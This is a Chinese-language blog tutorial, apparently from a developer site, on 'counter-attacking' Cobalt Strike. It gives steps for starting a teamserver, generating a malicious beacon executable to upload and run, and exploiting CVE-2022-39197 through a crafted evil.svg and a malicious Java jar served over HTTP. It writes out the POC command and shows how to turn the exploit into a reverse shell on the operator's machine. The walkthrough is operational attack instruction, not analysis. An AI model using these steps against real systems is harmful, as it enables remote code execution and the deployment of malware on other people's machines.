CS-反制

一、前置

1、权限更改,以便启动服务器端:chmod 777 *

2、启动服务器端

在当前目录下:./teamserver 192.168.228.129 pass

  • IP地址为本地IP地址,即启动服务器的那台主机IP
  • pass为连接密码

3、启动客户端:双击批处理文件(需要jdk环境)--》连接

4、生成恶意程序

  • 创建监听器:cs按钮--》监听器--》添加--》添加HTTP地址(保持默认的即可),端口更改

  • 生成恶意程序:有效载荷按钮--》  选择可执行程序 --》选择监听器---》确定---》保存文件

5、将恶意程序通过一些方式上传,运行

二、CS反制-远程控制工具启动

1、影响版本:CS<4.7.1

2、利用漏洞(CVE-2022-39197)

  • 编辑恶意文件内容,路径为EvilJar/src/main/java/Exploit.java

  • 使用Maven将文件打包,会在target目录下生成.jar的文件

  • 复制生成的文件到serve目录下,目录下有evil.svg文件

  • 修改evil.svg的文件内容

  • 在serve目录下开启web服务并验证是否能访问:python -m http.server 8888

  • 将恶意程序放到cve-2022-39197.py同一目录下(恶意程序名称要与py文件下的名字一致)
  • 执行POC:python cve-2022-39197.py beacon.exe http://IP地址:端口/evil.svg
  • cs服务器执行人员恰好查看系统进程时就会触发计算器

三、CS反制-反弹shell

1、双方开CS服务器,客户端

2、生成恶意程序:有效载荷按钮--》  选择payload生成器--》选择监听器--》选择输出格式:cmd

3、将生成的文件内容复制到Exploit.java文件的执行命令处,编译生成.jar工具

4、与上面步骤一致

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值